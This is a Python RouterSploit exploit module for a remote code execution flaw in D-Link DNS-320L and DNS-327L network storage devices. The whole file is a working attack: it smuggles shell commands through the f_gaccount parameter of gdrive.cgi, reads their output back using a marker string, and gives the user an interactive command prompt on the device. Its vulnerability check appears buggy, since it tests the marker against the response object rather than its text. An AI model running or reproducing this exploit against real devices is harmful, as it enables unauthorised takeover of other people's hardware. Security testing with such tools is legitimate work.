import requests
import re

from routersploit import (
    exploits,
    print_success,
    print_status,
    print_error,
    sanitize_url,
)


class Exploit(exploits.Exploit):
    """
    Exploit implementation for D-Link DNS-320L and DNS-327L Remote Code Execution vulnerability.
    If the target is vulnerable, command loop is invoked that allows executing commands on the device.
    """
    __info__ = {
        'name': 'D-LINK DNS-320L & DIR-327L RCE',
        'description': 'Module exploits D-Link DNS-320L, DNS-327L Remote Code Execution vulnerability which allows executing command on the device.',
        'authors': [
            'Gergely Eberhardt',  # vulnerability discovery
            'Marcin Bury <marcin.bury[at]reverse-shell.com>',  # routersploit module
        ],
        'references': [
            'http://www.search-lab.hu/media/D-Link_Security_advisory_3_0_public.pdf',
        ],
        'targets': [
            'DNS-320L 1.03b04',
            'DNS-327L, 1.02',
        ]
    }

    target = exploits.Option('', 'Target address e.g. http://192.168.1.1')
    port = exploits.Option(80, 'Target Port')

    def run(self):
        if self.check() is True:
            print_success("Target is vulnerable")
            print_status("Invoking command loop...")
            self.command_loop()
        else:
            print_error("Target is not vulnerable")

    def command_loop(self):
        while 1:
            cmd = raw_input("cmd > ")
            print self.execute(cmd)

    def execute(self, cmd):
        url = sanitize_url("{}:{}/cgi-bin/gdrive.cgi?cmd=4&f_gaccount=;{};echo ffffffffffffffff;".format(self.target, self.port, cmd))

        try:
            r = requests.get(url)
            res = r.text
        except:
            return False

        if 'ffffffffffffffff' in res:
            res = re.findall("(|.+?)ffffffffffffffff", res, re.DOTALL)

            if len(res):
                return res[0]

        return False

    def check(self):
        # meaby random mark should be implemented
        cmd = "echo 9fdbd928b52c1ef61615a6fd2e8b49af"
        url = sanitize_url("{}:{}/cgi-bin/gdrive.cgi?cmd=4&f_gaccount=;{};echo ffffffffffffffff;".format(self.target, self.port, cmd))

        try:
            r = requests.get(url)
        except:
            return None

        if "9fdbd928b52c1ef61615a6fd2e8b49af" in r:
            return True

        return False
